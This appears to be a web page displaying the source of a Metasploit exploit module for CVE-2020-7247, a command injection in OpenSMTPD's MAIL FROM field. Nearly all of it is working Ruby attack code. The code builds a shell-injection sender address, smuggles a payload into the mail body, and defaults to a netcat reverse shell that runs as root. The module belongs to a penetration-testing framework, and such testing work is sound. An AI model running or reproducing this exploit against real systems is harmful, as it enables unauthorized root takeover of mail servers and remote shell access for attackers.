Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote67Rank = ExcellentRanking89prepend Msf::Exploit::Remote::AutoCheck10include Msf::Exploit::Remote::Tcp11include Msf::Exploit::Remote::Expect1213def initialize(info = {})14super(15update_info(16info,17'Name' => 'OpenSMTPD MAIL FROM Remote Code Execution',18'Description' => %q{19This module exploits a command injection in the MAIL FROM field during20SMTP interaction with OpenSMTPD to execute a command as the root user.21},22'Author' => [23'Qualys', # Discovery and PoC24'wvu', # Module25'RageLtMan <rageltman[at]sempervictus>' # Module26],27'References' => [28['CVE', '2020-7247'],29['EDB', '48051'], # raptor's LPE/RCE exploit30['URL', 'https://seclists.org/oss-sec/2020/q1/40']31],32'DisclosureDate' => '2020-01-28',33'License' => MSF_LICENSE,34'Platform' => 'unix',35'Arch' => ARCH_CMD,36'Privileged' => true,37'Targets' => [38[39'OpenSMTPD 6.4.0 - 6.6.1',40{41'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars42}43]44],45'DefaultTarget' => 0,46'DefaultOptions' => {47'PAYLOAD' => 'cmd/unix/reverse_netcat'48},49'Notes' => {50'Stability' => [CRASH_SAFE],51'Reliability' => [REPEATABLE_SESSION],52'SideEffects' => [IOC_IN_LOGS]53}54)55)5657register_options([58Opt::RPORT(25),59OptString.new('RCPT_TO', [true, 'Valid mail recipient', 'root'])60])6162register_advanced_options([63OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])64])65end6667def check68connect69res = sock.get_once7071return CheckCode::Unknown unless res72return CheckCode::Detected if res =~ /^220.*ESMTP OpenSMTPD/7374CheckCode::Safe75rescue EOFError, Rex::ConnectionError => e76vprint_error(e.message)77CheckCode::Unknown78ensure79disconnect80end8182def exploit83# We don't care who we are, so randomize it84me = rand_text_alphanumeric(8..42)8586# Send mail to this valid recipient87to = datastore['RCPT_TO']8889# "Comment slide" courtesy of Qualys - brilliant!90rand_var = rand_text_alpha(1)91iter = rand_text_alphanumeric(14).chars.join(' ')92from = ";for #{rand_var} in #{iter};do read #{rand_var};done;sh;exit 0;"9394# Check against RFC 5321, even though OpenSMTPD is more permissive95if from.length > 6496print_warning('MAIL FROM field is greater than 64 chars')97end9899# Check for badchars, even though there shouldn't be any100if (badchars = (from.chars & target['MyBadChars'])).any?101print_warning("MAIL FROM field has badchars: #{badchars}")102end103104# Create the mail body with comment slide and payload105body = "\r\n#{"#\r\n" * 14}#{payload.encoded}"106107sploit = {108nil => /220.*OpenSMTPD/,109"HELO #{me}" => /250.*pleased to meet you/,110"MAIL FROM:<#{from}>" => /250.*Ok/,111"RCPT TO:<#{to}>" => /250.*Recipient ok/,112'DATA' => /354 Enter mail.*itself/,113body => nil,114'.' => /250.*Message accepted for delivery/,115'QUIT' => /221.*Bye/116}117118print_status('Connecting to OpenSMTPD')119connect120121print_status('Saying hello and sending exploit')122sploit.each do |line, pattern|123send_expect(124line,125pattern,126sock: sock,127newline: "\r\n",128timeout: datastore['ExpectTimeout']129)130end131rescue Rex::ConnectionError => e132fail_with(Failure::Unreachable, e.message)133rescue Timeout::Error => e134fail_with(Failure::TimeoutExpired, e.message)135ensure136disconnect137end138139end140141142